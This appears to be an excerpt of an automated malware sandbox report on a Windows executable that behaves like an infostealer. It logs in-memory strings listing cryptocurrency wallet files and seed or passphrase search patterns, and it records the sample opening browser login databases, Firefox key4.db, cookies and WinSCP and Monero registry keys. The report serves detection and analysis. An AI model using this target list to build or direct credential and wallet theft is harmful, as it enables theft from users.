            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: \Ethereum\
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: er*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*,*.txt,*.png,*.pdf,*.py|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3,*.url,*.ini,*.dll|Flash|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*,*.txt,*.png,*.pdf,*.py|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3,*.ini,*.url,*.dll|
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: er*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*,*.txt,*.png,*.pdf,*.py|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3,*.url,*.ini,*.dll|Flash|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*,*.txt,*.png,*.pdf,*.py|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3,*.ini,*.url,*.dll|
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: powershell.exe, 00000002.00000002.1779019343.00000000071C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
